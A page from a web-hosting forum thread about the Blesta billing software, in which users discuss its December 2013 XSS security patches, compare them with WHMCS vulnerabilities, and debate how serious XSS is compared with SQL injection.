Page 2 of 2 FirstFirst 12

Thread: How is Blesta?

Usa And Turkey based Shared, Reseller Hosting, VPS www.karincahosting.com

Funny, when there's a WHMCS security issue, people go crazy. When there's a Blesta security issue, you hardly hear about it.

** Security Update Issued
    ------------------------------------------------------------
    An update for Blesta was just released to address two security vulnerabilities and it is recommended that you update as soon as possible.

* [CORE-931] - Security: XSS vulnerability in client payment process
    * [CORE-932] - Security: Potential XSS vulnerabilities in use of Html::concat()
    Last edited by Tyl3r; 12-20-2013 at 06:56 PM.

Quote Originally Posted by stablehost View Post
    Funny, when there's a WHMCS security issue, people go crazy. When there's a Blesta security issue, you hardly hear about it.

Doesn't even look like it's in their CHANGELOG. This is what we received from Rack911

--

An update for Blesta was just released to address two security vulnerabilities and it is recommended that you update as soon as possible.

http://hostingseclist.us3.list-manag...6&e=8984051e46
    Probably because of:

1. They aren't as bad as WHMCS's vulnerabilities which could result in your system being accessed.

2. It's not been made public as it was found from a security expert or the Blesta team themselves.

Quote Originally Posted by CW Mike View Post
    Probably because of:

1. They aren't as bad as WHMCS's vulnerabilities which could result in your system being accessed.
    You don't think XSS issues are serious?

Maybe those issues were found internally and not made public prior to the patch...

The issue reported to us didn't appear to be actually exploitable. The other 2 we found. Nothing in the wild. It would be so easy to silently patch things, but we don't sweep anything under the rug.

Rack911 got on that quick. Awesome. Everyone should subscribe to their lists.
    Blesta - The Billing Platform for Hosting Providers
    Client Management, Billing, & Support Software
    Trial - Demo | 714-923-7325 | Twitter @blesta

You don't think XSS issues are serious?
    Would you rather have a XSS issue which can't damage anything serious or would you rather have a issue which allows someone to gain access to your administration area, download backups, download client information, even delete everything via mysql injections or changing files through a link?

Also the XSS couldn't allow anyone to gain admin access. So yes I don't think it is serious.

Would you rather have a XSS issue which can't damage anything serious
    You may wish to read up on XSS.
    Your one stop shop for decentralization

Quote Originally Posted by bear View Post
    You may wish to read up on XSS.
    I know they are both as bad, security wise like a billing system allowed admin access via a XSS, however these aren't high risk like many other systems.

https://www.owasp.org/index.php/Top_10_2010-Main

Open Web Application Security Project believe Injection(s) is the top risk (So I believe injection is a higher risk than a small harmless(ish) xss and it isn't as bad as a Mysql injection)... which other systems have had exploits for which are in the wild.

If someone hijacked an admin session (for instance), they have access to it all; logins, admin users, servers and so on. Someone using an injection to reveal admin users/emails/passwords (as in the October WHMCS issue) does less in that incarnation. It's foolish to downplay any such security issues as not being as bad, when they are, just in different ways.

What matters is if they're fixed, how quickly, and how well.
    Both Blesta and Hostbill seem to be dealing with these strikingly fast, and I'm not seeing complaints about things breaking. Good job, them.
    Your one stop shop for decentralization

Quote Originally Posted by bear View Post
    If someone hijacked an admin session (for instance), they have access to it all; logins, admin users, servers and so on. Someone using an injection to reveal admin users/emails/passwords (as in the October WHMCS issue) does less in that incarnation. It's foolish to downplay any such security issues as not being as bad, when they are, just in different ways.

What matters is if they're fixed, how quickly, and how well.
    Both Blesta and Hostbill seem to be dealing with these strikingly fast, and I'm not seeing complaints about things breaking. Good job, them.
    What bear said is how I feel. If a company is reporting what they are fixing internally it should not be held against them when it is done in way Hostbill and Blesta has been working on it. I recall a prior thread where it was stated that all software has vulnerabilities and I agree with that statement. The trick is actually, when you have a software company that works hard to actually find and fix the exploits before the exploit is used or becomes public.

I'm not, and not had any customer complain, however I can't answer for others, there was a thread about in the support forums.

You can edit them via the routes file which Tyson mentioned in the thread in the support forums.
    Got a link for that? My Google-fu is not showing me results relevant to that.

Er... never mind. Searching directly in the forums revealed the answer.

It's here for anyone else wondering: http://www.blesta.com/forums/index.p...-shorter-urls/
    ★ Nicholas @ EidolonHost
    ★ Blesta and InterWorx Reseller. See WebHost Licenses for details.
    ★ We have Let's Encrypt Support

Page 2 of 2 FirstFirst 12